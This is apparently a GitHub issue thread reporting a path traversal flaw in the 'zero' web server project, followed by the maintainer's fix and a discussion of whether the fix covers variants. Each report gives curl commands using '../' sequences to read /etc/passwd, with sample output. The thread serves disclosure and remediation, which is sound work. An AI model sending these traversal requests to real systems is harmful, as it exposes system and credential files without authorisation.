### ISSUE TITLE
Security: arbitrary file system leak

### ISSUE THREAD

**Issue by q3k** [remoteinterview/zero#3]
# curl -v --path-as-is 127.0.0.1:3000/../../../../../etc/passwd
    root:x:0:0:root:/root:/bin/bash
    [...]

**Comment by asadm** [comment]
I read your comment on HN and am working on fixing this.

**Comment by asadm** [comment]
Fixed in b4af5325c388e21a9bba4c9305c9a61693c73578

**Comment by mikebeyer** [comment]
Does your fix also cover the `# curl -v --path-as-is 127.0.0.1:3000/./../../../../../etc/passwd` case?

Also what about `~/../etc`

**Comment by q3k** [comment]
It does as far as I can tell, as it first builds the target path, simplifies it, and finally checks whether the resulting path would goes up a directory at all.

Also, `~/` is a shell construct, not libc/kernel operating system construct, so that wouldn't have worked regardless with just opening files (unless there's some JS automagic involved).

**Comment by mikebeyer** [comment]
Figured it was worth asking just Incase 😁
